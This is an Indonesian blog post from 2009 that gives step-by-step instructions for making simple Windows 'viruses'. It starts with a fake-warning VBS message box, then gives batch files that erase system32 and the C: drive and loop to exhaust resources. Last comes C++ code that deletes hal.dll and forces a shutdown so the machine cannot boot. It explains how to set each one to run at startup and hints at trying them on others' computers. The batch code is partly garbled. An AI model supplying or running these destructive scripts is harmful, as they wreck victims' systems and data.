jump to navigation

Pembuatan Virus Februari 19, 2009

Posted by rvd1 in Hacking, komputer, software, Tips dan Trik, Virus.
trackback

virus vbs sederhana

1. buka notepad

2. kopikan code berikut

Code:

lol=msgbox (“Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot”,20,”Warning”)

3. ubah namanya menjadi virus.vbs

4. ubah save as type menjadi all file

5. klik 2x virusnya

[Image: 25iawlh.jpg] oia pesan yang tdi bsa di rubah2. untuk menjalankan aplikasi otomatis pada waktu startup silahkan taruh file di C:\Documents and Settings\*namauser*\Start Menu\Programs\Startup…

virus ini hanya untuk gertakan, tidak terjadi apa2 jika di yes, juga tida terjadi apa2 jikadi no

virus batch sederhana, lumayan berbahaya

1.buka notepad

2.kopikan kode yang dibawah ini.

Code:

Virus terdeteksi // Title buat window xxx // sub skrip xxx msg * mencoba mendelete viruz // pesan erase “C:\WINDOWS\system32” // menghapus system32 start xxxx.bat // menjalankan file xxxx.bat yg disimpan pada folder yang sama msg * percobaan gagal,mencoba kembali // pesan goto xxxx // eksekusi xxxx.bat

3. save dengan nama virus.bat

4. ubah save as type menjadi all file

5. buka notepad kembali

6. kopikan kode yang dibawah ini.

Code:

Viruz // mengubah window title msg * Wah2 komputer anda kena viruz// pesan di message box del // Delete files /// “del c:” mengapus file yg di c: erase // sama kyk del start xxxx.bat // memulai xxxx.bat xxx // sub skrip goto // ke subskrip

7. ubah nama menjadi virus2.bat (catatan:jadikan all file,,simpan di folder yg sama dengan file yang pertama)

8. klo mau jalanin klik aja yg xxxx.bat(ini akan menghabiskan resource komputer km,sebaiknya siapkan tool seperti task kill).

9. klo mw jalanin otomatis pas startup caranya sama dengan viruz vbs

virus yang sangat berbahaya (jangan coba di rumah)

1.viruz ini di buat menggunakan c++,jadi siapkan tool c++(ex:dev c portable dan sejenisnya)

2.setelah itu kopikan source code di bawah ini

Code:

#include

#include

using namespace std;

int main(int argc, char *argv[])

{

std::remove(”C:\\windows\\system32\\hal.dll”); //PWNAGE TIME

system(”shutdown -s -r”);

system(”PAUSE”);

return EXIT_SUCCESS;

}

3.program ini akan menghapus hal.dll di direktori c,,,jadi sebaiknya jgn di eksekusi(kecuali anda siap menanggung resiko)

4.Don’t try this at your komputer(di komputer orang pikir-pikir lagi).he2

6.teknik yang lebih adavance lagi

7.kopikan code di bawah ini

Code:

#include

#include

using namespace std;

int main(int argc, char *argv[])

{

std::remove(”%systemroot%\\system32\\hal.dll”); //PWNAGE TIME

system(”shutdown -s -r”);

system(”PAUSE”);

return EXIT_SUCCESS;

}

8.perbedaan kode yang pertama dengan yang ini terletak pada proses pencarian direktori system secara otomatis(jdi klo yg pertama klo mw ngapus file hal.dll,filenya haruz di c:,klo yg ini otomatis nyari)

9.sekali lagi jangan gunakan program ini di komputer sendiri

tingkat kerusakan

1.tidak ada

2.menghabiskan resource

3.menghapus file hal.dll(bsa nyebabin tidak bisa booting,,kadang haruz install ulang)*danger*

silahkan klo ada yang mw nyoba2….*resiko di tanggung masing2, khususnya yg no.3

Komentar»

No comments yet — be the first.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: